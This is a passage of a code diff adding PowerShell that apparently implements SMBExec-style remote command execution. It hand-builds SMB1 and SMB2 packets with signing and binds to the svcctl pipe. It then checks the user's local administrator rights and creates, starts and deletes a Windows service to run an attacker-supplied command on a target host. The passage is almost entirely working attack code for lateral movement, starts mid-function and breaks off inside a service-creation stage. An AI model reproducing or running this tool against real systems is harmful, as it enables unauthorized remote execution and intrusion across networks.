+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ Write-Verbose "Trying to execute command on $Target"
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
+ {
+ Write-Output "Service $SMB_service creation failed on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Service creation fault context mismatch"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
+ {
+ Write-Output "Command executed with service $SMB_service on $Target"
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
+ {
+ Write-Output "Service $SMB_service failed to start on $Target"
+ }
+
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ Write-Verbose "Service $SMB_service deleted on $Target"
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBCloseRequest 0x00,0x40
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeDisconnectRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Logoff'
+ }
+
+ 'Logoff'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBLogoffAndXRequest
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ if($SMBExec_failed)
+ {
+ BREAK SMB_execute_loop
+ }
+
+ }
+
+ }
+ else
+ {
+
+ $SMB_client_stage = 'TreeConnect'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateRequest'
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ 'CreateRequest'
+ {
+ #$SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB2_tree_ID = $SMB_client_receive[40..43]
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes
+ $packet_SMB2_data["Share_Access"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ Write-Output "[-] Session connection is closed"
+ $SMB_client_stage = 'Exit'
+ }
+
+ if($Refresh -and $SMB_client_stage -ne 'Exit')
+ {
+ Write-Output "[+] Session refreshed"
+ $SMB_client_stage = 'Exit'
+ }
+ elseif($SMB_client_stage -ne 'Exit')
+ {
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ }
+
+ 'RPCBind'
+ {
+ $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadRequest'
+ {
+
+ Start-Sleep -m $Sleep
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+ $packet_SMB2_header["CreditCharge"] = 0x10,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+ else
+ {
+ $SMB_client_stage = 'StatusPending'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ }
+
+ 'OpenSCManagerW'
+ {
+ $SMB2_message_ID += 23
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+
+ $SMB_service_manager_context_handle = $SMB_client_receive[108..127]
+
+ if($SMB_execute -eq $true)
+ {
+ Write-Verbose "$output_username is a local administrator on $Target"
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ else
+ {
+ Write-Output "$output_username is a local administrator on $Target"
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage = 2
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00')
+ {
+ Write-Output "$output_username is not a local administrator or does not have required privilege on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Something went wrong with $Target"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+
+ if($SMBExec_command_bytes.Length -lt $SMB_split_index)
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+ else
+ {
+
+
+ }
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
